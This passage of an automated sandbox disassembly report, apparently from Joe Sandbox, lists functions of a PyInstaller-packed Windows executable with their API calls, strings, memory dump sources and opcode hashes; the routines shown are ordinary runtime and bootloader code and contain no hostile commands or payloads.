                                                                                                                                                                                                                                                            • Opcode ID: a6a3fb36dedf01dc407d01068d21ba79f730b9d247533213ec4f70efe0ab8627
                                                                                                                                                                                                                                                            • Instruction ID: 034fac8dac3773cf40ee69d2dac4f5db937848fbfd48adeca7cb6d57e4ecc282
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6a3fb36dedf01dc407d01068d21ba79f730b9d247533213ec4f70efe0ab8627
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0419272A1DA92D1EA30FB11A5402BA6394FF89BD4F444139DF5D97789DE3CE401C780
                                                                                                                                                                                                                                                            Function 00007FF6404E8400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: GetCurrentProcess.KERNEL32 ref: 00007FF6404E7B70
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: OpenProcessToken.ADVAPI32 ref: 00007FF6404E7B83
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: GetTokenInformation.ADVAPI32 ref: 00007FF6404E7BA8
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: GetLastError.KERNEL32 ref: 00007FF6404E7BB2
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: GetTokenInformation.ADVAPI32 ref: 00007FF6404E7BF2
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6404E7C0E
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: CloseHandle.KERNEL32 ref: 00007FF6404E7C26
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF6404E3814), ref: 00007FF6404E848C
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF6404E3814), ref: 00007FF6404E8495
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                            • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                            • Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                                                                                                            • Instruction ID: 2d982544cdd8630cc35464163c093093a424154aa6d2a0564f51409ab334d1d6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42215131A0C762E1FA54FB10E6153EA62A5FF89780F444035EA5D83796DF3CE944C790
                                                                                                                                                                                                                                                            Function 00007FF6404FA5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA5E7
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA61D
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA64A
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA65B
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA66C
                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA687
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                                            • Opcode ID: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                                                                                                                                                                                                                            • Instruction ID: b64dd40b253b18a8bbe84778933883f3cd32f1fef348ec2b8a951752d4b9c536
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C116D24F4C662E2FA587722565917D228B9F487B4F084734DC7ECB7D6DE2CB4118702
                                                                                                                                                                                                                                                            Function 00007FF6404E2300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                            • Opcode ID: a6e7d290dc67b0bb036b84f18c740492a81528deb91c8b42bdc3829a80364304
                                                                                                                                                                                                                                                            • Instruction ID: bbc525334e2aa9c077ecc34c495dd18d7bf194e79ba6aa1856a38e0a29ca8308
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6e7d290dc67b0bb036b84f18c740492a81528deb91c8b42bdc3829a80364304
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80317C32A0DA9299EB24FF61E9552FA6360FF89788F440135EA4D8BB99DF3CD100C700
                                                                                                                                                                                                                                                            Function 00007FF6404E2760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                                                            • API String ID: 1878133881-640379615
                                                                                                                                                                                                                                                            • Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                                                                                                                                                                                                            • Instruction ID: 8fdea9c080354823018bc7794959ffe1a56e67eba9726776bf4b4746d7d2f12b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4321517261CA96A1FA24FB10F4517EA6364FF84788F400136EA8C93B99DF7CD645C780
                                                                                                                                                                                                                                                            Function 00007FF6404F8DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                            • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                                                            • Instruction ID: d4fc5498ea7318f53537cfa785147e5897ce368d805e0ddb2dfcd704c11da3f3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81F04F21B1DB12A1FA18BB24A4983796321EF4AB65F540639D97D8A3E4CF2CD549C300
                                                                                                                                                                                                                                                            Function 00007FF640508678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                                                                            • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                            • Instruction ID: 001b1ef2e6aecc85541d158118c28d47e3565e1bfbc7644172781a8234dd8869
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5711B232E1CA2362F65C3128D655B7D1140EF6737CF6A0634EDFE867DA8E2EA8808510
                                                                                                                                                                                                                                                            Function 00007FF6404FA6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA6BF
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA6DE
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA706
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA717
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA728
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                                            • Opcode ID: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                                                                                                                                                                                                                            • Instruction ID: 9270d81edf57d1095dfa68cf2718a3606eebceb162612fbf8d19bff2acd8ac43
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E115E64F0C662E2FA58B7269645579219B5F983B0F084334EC3ECB7D6DE2CF9118701
                                                                                                                                                                                                                                                            Function 00007FF6404FA534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                                            • Opcode ID: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                                                                                                                                                                                                                            • Instruction ID: 51b98c31ef0ea062ffa1152fea1eb07504785dc448ceaa345d1643a5bbdef9b7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 451123A0E4C227F2FA68B77644591B9228B4F49370E086734D93ECB3D2ED2CB8518302
                                                                                                                                                                                                                                                            Function 00007FF6404F52B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: verbose
                                                                                                                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                            • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                                                            • Instruction ID: c929a27461afeba3e76d11864a1beaef009112ee6c67597de271af61dfb95879
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2391AF32A0CA66E1E721BE29E45037D379BAB40B99F884136DB5D873D9DF3CE8458304
                                                                                                                                                                                                                                                            Function 00007FF6404FEED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                            • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                                                            • Instruction ID: 309420085532cd179c2b0c260f54809d0f7e54be323ac4e172d0e8a3e367e090
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9581A272E0C223FAF7747F25C21027926AAAF11B48F558035CA09D7796DF2DE941A722
                                                                                                                                                                                                                                                            Function 00007FF6404EC968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                            • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                                                            • Instruction ID: ea18bcb2ca4c266a869d2e7a81082bc039e02fc8e56005ab48a7f25f1fed8839
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D51A132B2D626EADB14FB15E444A787791FB44B89F108130EA5987788EF7CE842C780
                                                                                                                                                                                                                                                            Function 00007FF6404EE1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                            • Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                                                                                                                                                                                            • Instruction ID: d26ef062bfe7f57b41249af47701fcc6fa16d6a2e638fa0a049ebbc3da8f672a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3617F3290CBD5D5EB21EB16E4407AAB7A0FB85794F044225EB9C47B99DF7CE190CB40
